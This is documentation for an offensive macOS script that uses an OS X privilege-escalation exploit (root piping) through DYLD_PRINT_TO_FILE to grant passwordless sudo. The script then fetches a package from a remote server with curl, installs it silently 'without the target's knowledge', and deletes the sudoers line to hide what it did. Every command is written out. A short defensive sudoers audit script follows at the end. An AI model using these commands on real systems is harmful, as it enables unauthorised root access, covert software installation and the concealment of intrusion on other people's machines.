Peter Piper Documentation
1. INTRODUCTION
This script was written as an alternative to legitimate authentication in AppleScript. It relies on an OS X privilege-escalation technique known as root piping.
2. EXPLOIT
This exploit uses a vulnerability that was properly fixed in OS X 10.10.5. Its reference information is here.
Whichever user executes it is granted admin rights (passwordless sudo) immediately.
3. INSTALL
We use cURL to fetch the Java 8 Update 60 package onto the target computer into a temporary directory, then the installer command that ships with the OS X command line to install the .pkg we fetched. This is the right command for the task because it skips the graphical installer, so it runs behind the scenes without the target's knowledge.
4. CLEANUP
We first remove the temporary directory used to store the Java package during install, then we use the sed command to remove the target from the sudoers list.
5. function KeepSafe { } & trap
The KeepSafe function is registered with trap so that it still runs to completion if a command in the script fails.
IN-DEPTH LOOK AT COMMANDS
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;
- Exploit the machine
sudo bash -c
- Create a root bash shell
if [[ $EUID -ne 0 ]]; then echo -e "\033[1mFailed! No root!\033[0m"; exit 1; fi
- Check if the exploit actually worked, if not, exit the script
sudo mkdir -v /tmp$$;
- Make a temporary directory to store the package in
sudo curl -# http://<SERVER_ADDRESS>/Java_8_Update_60.pkg > /tmp$$/Java_8_Update_60.pkg;
- Get the package
sudo installer -verbose -pkg /tmp$$/Java_8_Update_60.pkg -target LocalSystem;
- Install the package
sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers;
- Remove the line allowing root access without a password
rm -rfv /tmp$$;
- Remove the temporary directory
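As an added defensive check that is not part of the original script: a POSIX shell audit that scans a copy of a sudoers file for the footprint this technique leaves behind, namely a passwordless (NOPASSWD) grant for an account outside an expected allow-list. The default allow-list ("root %admin") and the sample file contents are constructed assumptions.

```shell
#!/bin/sh
# audit_sudoers FILE [ALLOWED]
# Prints every line that grants passwordless sudo to a user or group not in
# ALLOWED (space separated; default "root %admin" is an assumption).
# Returns 0 when nothing unexpected is found, 1 otherwise.
audit_sudoers() {
    file=$1
    allowed=${2:-"root %admin"}
    found=0
    set -f                              # no glob expansion while splitting fields
    while IFS= read -r line || [ -n "$line" ]; do
        set -- $line                    # $1 becomes the user/group field
        [ $# -eq 0 ] && continue        # blank line
        case "$1" in "#"*) continue ;; esac        # comment line
        case "$line" in *NOPASSWD:*) ;; *) continue ;; esac
        ok=0
        for a in $allowed; do
            [ "$a" = "$1" ] && ok=1
        done
        if [ "$ok" -eq 0 ]; then
            printf 'UNEXPECTED passwordless grant: %s\n' "$line"
            found=1
        fi
    done < "$file"
    set +f
    return "$found"
}

# Constructed sample sudoers content for a stand-alone run: two expected grants
# and one appended passwordless grant of the form the technique writes.
sample=$(mktemp)
printf 'root\tALL=(ALL) ALL\n%%admin\tALL=(ALL) ALL\nalice ALL=(ALL) NOPASSWD:ALL\n' > "$sample"
if audit_sudoers "$sample"; then echo "sudoers clean"; else echo "review /etc/sudoers"; fi
rm -f "$sample"
```

On a live system point it at a copy made with visudo -c or sudo cat, since the function only needs read access to the file.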